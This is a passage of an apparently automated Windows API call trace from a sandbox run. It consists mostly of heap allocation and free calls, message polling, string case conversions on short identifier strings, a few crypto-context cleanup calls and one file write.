hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24165e8 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416710 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24164c0 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416a58 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416398 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416b80 | out: hHeap=0x25c0000) returned 1 [0163.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.693] WriteFile (in: hFile=0x170, lpBuffer=0x2416398*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x8bf5ec, lpOverlapped=0x0 | out: lpBuffer=0x2416398*, lpNumberOfBytesWritten=0x8bf5ec*=0x120, lpOverlapped=0x0) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416398 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.694] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0163.694] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.694] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0163.694] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.694] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0163.694] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.695] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.695] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.695] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0163.695] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.695] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0163.695] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0163.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.695] CryptDestroyKey (hKey=0xaa56a0) returned 1 [0163.695] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.695] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.695] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0163.695] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.695] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0163.695] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.695] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.695] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0163.695] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.696] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0163.696] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.696] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.696] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0163.696] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.696] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.696] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0163.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.696] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0163.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.696] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.697] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0163.697] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.697] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0163.697] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.697] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.697] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.697] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.697] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.697] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.697] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.697] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.697] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.697] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.697] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.697] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.697] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.697] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0163.698] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.698] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0163.698] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.698] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.698] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416398 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.698] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0163.698] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.698] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.699] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.699] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.699] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.699] FreeLibrary (hLibModule=0x74d40000) returned 1 [0163.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0163.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0163.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0163.699] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0163.700] RtlAllocateHeap (HeapHandle=0x25c0000, 